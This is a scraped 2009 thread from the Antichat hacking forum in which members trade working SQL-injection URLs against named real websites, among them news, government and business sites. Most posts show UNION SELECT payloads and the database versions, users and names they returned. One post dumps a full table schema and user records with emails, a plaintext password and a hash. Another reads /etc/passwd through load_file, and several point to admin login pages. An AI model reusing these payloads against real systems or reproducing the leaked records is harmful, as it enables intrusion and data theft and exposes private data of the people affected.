Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

23.03.2009, 00:02
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме: 1385078
Репутация:
126
|
|
САМАРА Сегодня
http://www.samaratoday.ru/news.php?id=-166793+union+select+1,2,3,4,5,concat_ws(0x3a,versi on(),database(),user()),7,8,9,0,1,2,3,4,5,6,7--
Database Version: 5.0.45
Database name: samaratoda_news
User name: samaratoda_news@localhost
Код:
16 :In database information_schema found table USER_PRIVILEGES
1 : GRANTEE
2 : TABLE_CATALOG
3 : PRIVILEGE_TYPE
4 : IS_GRANTABLE
17 :In database information_schema found table VIEWS
1 : TABLE_CATALOG
2 : TABLE_SCHEMA
3 : TABLE_NAME
4 : VIEW_DEFINITION
5 : CHECK_OPTION
6 : IS_UPDATABLE
7 : DEFINER
8 : SECURITY_TYPE
18 :In database samaratoda_news found table authors
1 : idAuthor
2 : nameAuthor
3 : orgNameAuthor
4 : emailAuthor
19 :In database samaratoda_news found table comment
1 : idComment
2 : idNewsComment
3 : dateComment
4 : nickComment
5 : textComment
6 : emailComment
7 : ipComment
20 :In database samaratoda_news found table confirm
1 : idConfirm
2 : dateExpirate
3 : random
4 : idUser
21 :In database samaratoda_news found table groups
1 : groupid
2 : groupname
22 :In database samaratoda_news found table grouptouser
1 : grouptouserid
2 : userid
3 : groupid
23 :In database samaratoda_news found table indexDayCache
1 : cacheIndex
2 : idNews
3 : dateNews
4 : headNews
24 :In database samaratoda_news found table links
1 : idLink
2 : nameLink
3 : urlLink
4 : idRubLink
5 : idTopicLink
6 : exportFlagLink
25 :In database samaratoda_news found table login_jour
1 : idLogin
2 : dateLogin
3 : ipLogin
4 : idUserLogin
26 :In database samaratoda_news found table mylog
1 : Id
2 : log_time
3 : logtext
27 :In database samaratoda_news found table news
1 : idNews
2 : dateNews
3 : idRubNews
4 : idAuthorNews
5 : idPhotographerNews
6 : headNews
7 : lidNews
8 : bodyNews
9 : sourceNews
10 : priorAttrNews
11 : urlSourceNews
12 : titleImgNews
13 : showAnnonceNews
14 : textAnnonceNews
15 : autoDayNews
16 : urlOrigNews
17 : urlCitNews
28 :In database samaratoda_news found table news2006
1 : idNews
2 : dateNews
3 : idRubNews
4 : idAuthorNews
5 : idPhotographerNews
6 : headNews
7 : lidNews
8 : bodyNews
9 : sourceNews
10 : priorAttrNews
11 : urlSourceNews
12 : titleImgNews
13 : showAnnonceNews
14 : textAnnonceNews
15 : autoDayNews
29 :In database samaratoda_news found table news_arch
1 : idNews
2 : dateNews
3 : idRubNews
4 : idAuthorNews
5 : idPhotographerNews
6 : headNews
7 : lidNews
8 : bodyNews
9 : sourceNews
10 : priorAttrNews
11 : urlSourceNews
12 : titleImgNews
13 : showAnnonceNews
14 : textAnnonceNews
15 : autoDayNews
16 : urlOrigNews
17 : urlCitNews
30 :In database samaratoda_news found table news_cache
1 : cacheIndex
2 : idNews
3 : dateNews
4 : idRubNews
5 : idAuthorNews
6 : idPhotographerNews
7 : headNews
8 : lidNews
9 : bodyNews
10 : sourceNews
11 : priorAttrNews
12 : urlSourceNews
13 : titleImgNews
14 : showAnnonceNews
15 : textAnnonceNews
16 : autoDayNews
31 :In database samaratoda_news found table news_log
1 : idLog
2 : idNews
3 : dateNews
4 : idRubNews
5 : idAuthorNews
6 : idPhotographerNews
7 : headNews
8 : lidNews
9 : bodyNews
10 : sourceNews
11 : priorAttrNews
12 : urlSourceNews
13 : titleImgNews
14 : showAnnonceNews
15 : textAnnonceNews
16 : autoDayNews
17 : userId
18 : date_zapros
19 : zapros
20 : urlOrigNews
21 : urlCitNews
32 :In database samaratoda_news found table news_topics
1 : idNews_Topic
2 : idNews
3 : idTopic
33 :In database samaratoda_news found table news_users
1 : idNews_User
2 : idNews
3 : idUser
34 :In database samaratoda_news found table photographers
1 : idPhotographer
2 : namePhotographer
3 : orgNamePhotographer
35 :In database samaratoda_news found table rubrics
1 : idRubric
2 : nameRubric
3 : lidRubric
4 : sortIdRubric
36 :In database samaratoda_news found table seqid
1 : idSeq
2 : dummy
37 :In database samaratoda_news found table seqid_t
1 : idSeq
2 : dummy
38 :In database samaratoda_news found table subscr_users
1 : userid
2 : username
3 : passwrd
4 : email
5 : firstname
6 : lastname
7 : middlename
8 : countryid
9 : state
10 : city
11 : zip
12 : address
13 : phone
14 : cellphone
15 : pgrphone
16 : pgrnumber
39 :In database samaratoda_news found table subscribe
1 : subscribeId
2 : created
3 : subscribeName
4 : subscribePeriod
5 : userId
6 : confirm
40 :In database samaratoda_news found table topics
1 : idTopic
2 : nameTopic
3 : actualAttrTopic
41 :In database samaratoda_news found table update_status
1 : id_update_status
2 : update_time
3 : update_finished
42 :In database samaratoda_news found table user_rubric
1 : idUser_rubric
2 : idUser
3 : idRubric
43 :In database samaratoda_news found table users
1 : userid
2 : username
3 : passwrd
4 : email
5 : firstname
6 : lastname
7 : middlename
8 : countryid
9 : state
10 : city
11 : zip
12 : address
13 : phone
14 : cellphone
15 : pgrphone
16 : pgrnumber
в табличку USERS тока 2 записи:
[1]:1:Светлана:111111:svgor@bk.ru
[2]:2:Alex:8e956352ad5b3a54076586b4f612b601:balex42@g mail.com
второй хэш не осилил)
Последний раз редактировалось jokester; 23.03.2009 в 00:32..
|
|
|

23.03.2009, 00:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Код:
http://www.kcsoul.com/urban-events-calendar/detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
user() : database() : version()
sherryml_genuser@localhost : sherryml_db : 5.0.45-community
|
|
|

23.03.2009, 00:49
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме: 81772
Репутация:
10
|
|
Код:
http://www.ppi-jepang.org/print.php?id=-61+union+select+1,2,3,version(),5,6,7--
Код:
http://ebursa.depdiknas.go.id/pustaka/ptk/record.php?id=-28%20union%20select%201,2,table_name%20from%20information_schema.tables--
|
|
|

23.03.2009, 01:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Код:
http://www.mef.gov.kh/new_mef/macroeconomic-detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6
user() : database() : version()
mefgovkh_web@216.65.1.253 : mefgovkh_web : 5.0.32-Debian_7etch5~bpo31+1-log
|
|
|

23.03.2009, 01:17
|
|
Новичок
Регистрация: 06.03.2009
Сообщений: 5
Провел на форуме: 10850
Репутация:
16
|
|
http://www.passionforstone.eu/index.php?id_sect=-1+union+select+concat_ws(0x3a3a,user(),database(), version())--
Админка по адресу: http://www.passionforstone.eu/admin/login.php
В базе отсутствуют поля отвечающие за аутентификацию. Или разделение прав или прописано в файлах.
|
|
|

23.03.2009, 01:39
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме: 1446969
Репутация:
169
|
|
Код:
http://www.foresia.com/images/index.php?pageid=217204'+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+--+
user(): Stamco02@stamco.mynewserver.com
database(): stamco
version(): 4.1.22
PR: 3
---------------------------------------------------
Код:
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7+--+
Код:
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7+--+
user(): b2becat@10.0.0.16
database(): Kincrome
version(): 5.0.56sp1-enterprise-gpl
PR: 4
---------------------------------------------------
Код:
http://www.mirabili.it/fotobis.php?idevento=-29+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6/*
user(): mirabilidb@localhost
database(): mirabili_it
version(): 4.0.24_Debian-10sarge3-log
PR: 4
|
|
|

23.03.2009, 02:11
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме: 3659973
Репутация:
466
|
|
http://trentondevils.com/page.php?pid=-228+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
Database Version: 4.1.20-log
Database name: tdevils_db
User name: tdevils@localhost
|
|
|

23.03.2009, 03:29
|
|
Новичок
Регистрация: 06.03.2009
Сообщений: 5
Провел на форуме: 10850
Репутация:
16
|
|
http://www.initiativeforpeacebuilding.eu/resource.php?c=-1+union+select+1,concat_ws(0x3a3a,user(),version() ,database()),3,4--
http://www.initiativeforpeacebuilding.eu/Admin <- Basic auth
|
|
|

23.03.2009, 04:48
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме: 3020589
Репутация:
240
|
|
Код:
http://www.vsmc.com.vn/news_detail.php?id=19+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+limit+1,1
version():5.0.67-community
database():vsmccom_datavsmc
user():vsmccom_sisoft@localhost
|
|
|

23.03.2009, 15:32
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме: 81772
Репутация:
10
|
|
Код:
http://www.textile.web.id/member/index.php?id=-21+union+select+version(),2,3,4--
Код:
http://www.iwandarmansjah.web.id/medical.php?id=-309+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9--
Последний раз редактировалось jokester; 23.03.2009 в 18:18..
Причина: esqway165.com БОЯН
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|